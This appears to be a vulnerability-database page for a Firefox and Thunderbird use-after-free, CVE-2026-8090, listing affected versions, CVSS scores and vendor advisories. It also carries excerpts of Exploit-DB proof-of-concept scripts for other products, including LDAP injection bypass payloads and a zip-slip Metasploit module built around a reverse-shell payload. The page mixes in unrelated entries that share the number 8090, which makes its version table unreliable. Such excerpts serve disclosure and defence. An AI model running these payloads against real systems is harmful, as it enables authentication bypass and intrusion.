CVE-2026-8090
published 2026-05-07CVE-2026-8090: Use-after-free in the DOM: Networking component. This vulnerability was fixed in Firefox 150.0.2, Firefox ESR 140.10.2, Firefox ESR 115.35.2, Thunderbird…
PriorityP341high7.3CVSS 3.1
AVNACLPRNUINSUCLILAL
EPSS
0.32%
24.0th percentile
Use-after-free in the DOM: Networking component. This vulnerability was fixed in Firefox 150.0.2, Firefox ESR 140.10.2, Firefox ESR 115.35.2, Thunderbird 150.0.2, and Thunderbird 140.10.2.
Affected
13 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mozilla | firefox | < Firefox 150.0.2 | Firefox 150.0.2 |
| mozilla | firefox | < 115.35.2 | 115.35.2 |
| mozilla | firefox | < 150.0.2 | 150.0.2 |
| mozilla | firefox | — | — |
| mozilla | firefox | >= 128.0 < 140.10.2 | 140.10.2 |
| mozilla | firefox_esr | < Firefox ESR 115.35.2 | Firefox ESR 115.35.2 |
| mozilla | firefox_esr | < Firefox ESR 140.10.2 | Firefox ESR 140.10.2 |
| mozilla | thunderbird | < Thunderbird 140.10.2 | Thunderbird 140.10.2 |
| mozilla | thunderbird | < Thunderbird 150.0.2 | Thunderbird 150.0.2 |
| mozilla | thunderbird | < 140.10.2 | 140.10.2 |
| mozilla | thunderbird | < 150.0.2 | 150.0.2 |
| openbsd | openssh | >= 0 < 1:8.2p1-4ubuntu0.13+esm1 | 1:8.2p1-4ubuntu0.13+esm1 |
| rhel10 | firefox-flatpak | — | — |
CVSS provenance
nvdv3.17.3HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
osv3.6LOW
vendor_redhat7.3HIGH
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Red Hat
firefox: Use-after-free in the DOM: Networking component
vendor_redhat·2026-05-07·CVSS 7.3
CVE-2026-8090 [HIGH] CWE-825 firefox: Use-after-free in the DOM: Networking component
firefox: Use-after-free in the DOM: Networking component
A flaw was found in Firefox. The Mozilla Foundation's Security Advisory describes the following issue:
Use-after-free in the DOM: Networking component
Statement: Red Hat Product Security rates the severity of this flaw as determined by the Mozilla Foundation Security Advisory.
Package: firefox (Red Hat Enterprise Linux 10) - Affected
Package: rhel10/firefox-flatpak (Red Hat Enterprise Linux 10) - Affected
Package: firefox (Red Hat Enterprise Linux 6) - Out of support scope
Package: firefox (Red Hat Enterprise Linux 7) - Affected
Package: firefox (Red Hat Enterprise Linux 8) - Affected
Package: firefox (Red Hat Enterprise Linux 9) - Affected
Mozilla
Mozilla Foundation Security Advisory 2026-44: CVE-2026-8090
vendor_mozilla·CVSS 7.3
CVE-2026-8090 [HIGH] Mozilla Foundation Security Advisory 2026-44: CVE-2026-8090
Mozilla Foundation Security Advisory 2026-44
CVE: CVE-2026-8090
Product: Thunderbird
Impact: high
Fixed in: Thunderbird 140.10.2
Mozilla
Mozilla Foundation Security Advisory 2026-42: CVE-2026-8090
vendor_mozilla·CVSS 7.3
CVE-2026-8090 [HIGH] Mozilla Foundation Security Advisory 2026-42: CVE-2026-8090
Mozilla Foundation Security Advisory 2026-42
CVE: CVE-2026-8090
Product: Firefox ESR
Impact: high
Fixed in: Firefox ESR 115.35.2
Mozilla
Mozilla Foundation Security Advisory 2026-40: CVE-2026-8090
vendor_mozilla·CVSS 7.3
CVE-2026-8090 [HIGH] Mozilla Foundation Security Advisory 2026-40: CVE-2026-8090
Mozilla Foundation Security Advisory 2026-40
CVE: CVE-2026-8090
Product: Firefox
Impact: high
Fixed in: Firefox 150.0.2
Mozilla
Mozilla Foundation Security Advisory 2026-43: CVE-2026-8090
vendor_mozilla·CVSS 7.3
CVE-2026-8090 [HIGH] Mozilla Foundation Security Advisory 2026-43: CVE-2026-8090
Mozilla Foundation Security Advisory 2026-43
CVE: CVE-2026-8090
Product: Thunderbird
Impact: high
Fixed in: Thunderbird 150.0.2
Mozilla
Mozilla Foundation Security Advisory 2026-41: CVE-2026-8090
vendor_mozilla·CVSS 7.3
CVE-2026-8090 [HIGH] Mozilla Foundation Security Advisory 2026-41: CVE-2026-8090
Mozilla Foundation Security Advisory 2026-41
CVE: CVE-2026-8090
Product: Firefox ESR
Impact: high
Fixed in: Firefox ESR 140.10.2
GHSA
GHSA-4345-ccpc-8955: Use-after-free in the DOM: Networking component
ghsa_unreviewed·2026-05-07
CVE-2026-8090 [HIGH] CWE-416 GHSA-4345-ccpc-8955: Use-after-free in the DOM: Networking component
Use-after-free in the DOM: Networking component. This vulnerability was fixed in Firefox 150.0.2, Firefox ESR 140.10.2, and Firefox ESR 115.35.2.
GHSA
DevSpace UI Server WebSocket CheckOrigin does not validate source
ghsa·2026-05-06
CVE-2026-42283 [HIGH] CWE-200 DevSpace UI Server WebSocket CheckOrigin does not validate source
DevSpace UI Server WebSocket CheckOrigin does not validate source
### Description
DevSpace's UI server WebSocket accepts connections from all origins by default, and therefore several endpoints are exposed via this WebSocket. When a developer runs the DevSpace UI and at the same time uses a browser to access the internet, a malicious website they visit can use their browser to establish a cross-origin WebSocket connection to `ws://127.0.0.1:8090`. This allows an attacker to access:
* `/api/logs` to stream real-time pod logs
* `/api/enter` to open an interactive shell inside the running pod
* `/api/command` to execute pre-defined pipeline commands
### Patches
Versions 6.3.21 and above are patched.
### Resources
[gorilla/websocket CheckOrigin documentation](https://pkg.go.dev/github.co
OSV
openssh vulnerabilities
osv·2026-03-12·CVSS 3.6
CVE-2026-3497 openssh vulnerabilities
openssh vulnerabilities
USN-8090-1 fixed vulnerabilities in OpenSSH. This update provides the
corresponding updates for Ubuntu 20.04 LTS.
Original advisory details:
Jeremy Brown discovered that the OpenSSH GSSAPI Key Exchange incorrectly
handled disconnecting clients. In non-default configurations where the
GSSAPIKeyExchange setting is enabled, a remote attacker could use this
issue to cause OpenSSH to crash, resulting in a denial of service, or
possibly execute arbitrary code. (CVE-2026-3497)
David Leadbeater discovered that OpenSSH incorrectly handled certain
control characters in usernames. When untrusted usernames and the
ProxyCommand are being used, an attacker could possibly use this issue to
execute arbitrary code. (CVE-2025-61984)
David Leadbeater discovered that OpenSSH incor
No detection rules found.
Exploit-DB
YAMCS yamcs-core 5.12.7 - User Enumeration
exploitdb·2026-05-30
CVE-2026-44595 YAMCS yamcs-core 5.12.7 - User Enumeration
YAMCS yamcs-core 5.12.7 - User Enumeration
---
# Exploit Title: YAMCS yamcs-core 1 else "http://localhost:8090"
username = sys.argv[2] if len(sys.argv) > 2 else "testuser"
password = sys.argv[3] if len(sys.argv) > 3 else "test"
base = target.rstrip("/")
print("=" * 65)
print(" CVE-2026-44595 — YAMCS IAM User Enumeration PoC")
print(f" Target: {target}")
print(f" Username: {username} (low-privilege account)")
print("=" * 65)
# Authenticate
print(f"\n[1] Authenticating as low-privilege user...")
try:
resp = requests.post(f"{base}/auth/token",
data={"grant_type": "password",
"username": username,
"password": password})
if resp.status_code != 200:
print(f" [-] Auth failed: HTTP {resp.status_code}")
print(f" [*] Create test user: yamcsadmin users create testuser --password test")
return
t
Exploit-DB
YAMCS yamcs-core 5.12.7 - LDAP Injection
exploitdb·2026-05-30
CVE-2026-42568 YAMCS yamcs-core 5.12.7 - LDAP Injection
YAMCS yamcs-core 5.12.7 - LDAP Injection
---
# Exploit Title: YAMCS yamcs-core 5.12.7 - LDAP Injection
# Date: 2026-05-27
# Exploit Author: Daniel Miranda Barcelona (Excal1bur)
# Vendor Homepage: https://yamcs.org
# Software Link: https://github.com/yamcs/yamcs
# Version: 1 else "http://localhost:8090"
base = target.rstrip("/")
print("=" * 65)
print(" CVE-2026-42568 — YAMCS LDAP Injection PoC")
print(f" Target: {target}")
print(" Requires: LdapAuthModule configured in yamcs.yaml")
print("=" * 65)
payloads = [
{
"name": "Universal bypass",
"username": "*)(uid=*))(|(uid=*",
"password": "anything",
},
{
"name": "Targeted bypass (admin)",
"username": "admin)(|(objectClass=*",
"password": "wrongpassword",
},
{
"name": "Wildcard match",
"username": "op*",
"password": "anything",
}
]
for i,
Exploit-DB
HUSTOJ Zip-Slip v26.01.24 - RCE
exploitdb·2026-04-30·CVSS 9.3
CVE-2026-24479 [CRITICAL] HUSTOJ Zip-Slip v26.01.24 - RCE
HUSTOJ Zip-Slip v26.01.24 - RCE
---
# Exploit Title: HUSTOJ Zip-Slip v26.01.24 - RCE
# Date: 2026-02-14
# Exploit Author: Marshall Whittaker / oxagast
# Vendor Homepage: https://github.com/zhblue/hustoj
# Software Link: http://123.158.38.129:8090/livecd/HUSTOJ25.05.iso
(LiveCD, or see above git repo)
# Version: Before v26.01.24
# Tested on: Ubuntu
# CVE: CVE-2026-24479
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# This payload is configured for:
# msfvenom -p linux/x86/meterpreter_reverse_tcp --format elf
#
# Patch:
# $file_name = $path.zip_entry_name($dir_resource);
# $file_name=str_replace('../', '', $file_name);
# $file_path = substr($file_name,0,strrpos($file_name, "/"));
#
# msf exploit(loca
https://bugzilla.mozilla.org/show_bug.cgi?id=2034352https://www.mozilla.org/security/advisories/mfsa2026-40/https://www.mozilla.org/security/advisories/mfsa2026-41/https://www.mozilla.org/security/advisories/mfsa2026-42/https://www.mozilla.org/security/advisories/mfsa2026-43/https://www.mozilla.org/security/advisories/mfsa2026-44/https://access.redhat.com/errata/RHSA-2026:19160https://access.redhat.com/errata/RHSA-2026:20566https://access.redhat.com/errata/RHSA-2026:20574https://access.redhat.com/errata/RHSA-2026:24508https://access.redhat.com/errata/RHSA-2026:24509https://access.redhat.com/errata/RHSA-2026:24510https://access.redhat.com/errata/RHSA-2026:24511https://access.redhat.com/errata/RHSA-2026:24516https://access.redhat.com/errata/RHSA-2026:24755https://access.redhat.com/errata/RHSA-2026:24983https://access.redhat.com/errata/RHSA-2026:25015https://access.redhat.com/security/cve/CVE-2026-8090https://bugzilla.redhat.com/show_bug.cgi?id=2467709https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-8090.json
2026-05-07
Published